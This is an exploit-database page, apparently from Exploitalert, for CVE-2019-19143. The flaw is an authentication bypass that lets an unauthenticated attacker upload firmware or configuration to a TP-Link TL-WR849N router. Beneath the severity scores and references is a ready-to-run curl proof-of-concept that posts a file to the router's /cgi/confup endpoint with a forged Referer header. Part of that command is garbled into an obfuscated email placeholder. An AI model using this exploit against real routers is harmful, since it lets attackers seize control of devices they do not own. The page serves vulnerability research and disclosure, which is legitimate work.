Advertisement






TL-WR849N 0.9.1 4.16 Authentication Bypass (Upload Firmware)

CVE Category Price Severity
CVE-2019-19143 CWE-287 Unknown High
Author Risk Exploitation Type Date
Unknown High Remote 2020-03-08
CPE
cpe:cpe:/h:tp-link:tl-wr849n_firmware:0.9.1.4.16
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020030034

Below is a copy:

TL-WR849N 0.9.1 4.16 Authentication Bypass (Upload Firmware)
# Exploit Title: TL-WR849N 0.9.1 4.16 - Authentication Bypass (Upload Firmware)
# Date: 2019-11-20
# Exploit Author: Elber Tavares
# Vendor Homepage: https://www.tp-link.com/
# Software Link: https://www.tp-link.com/br/support/download/tl-wr849n/#Firmware
# Version: TL-WR849N 0.9.1 4.16
# Tested on: linux, windows
# CVE : CVE-CVE-2019-19143

Uploading new firmware without access to the panel

REFS:
 https://github.com/ElberTavares/routers-exploit/tp-link
 https://fireshellsecurity.team/hack-n-routers/


Poc:
curl -i -X POST -H "Content-Type: multipart/form-data" -H "Referer:
http://TARGET/mainFrame.htm" -F [email protected]
http://TARGET/cgi/confup

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum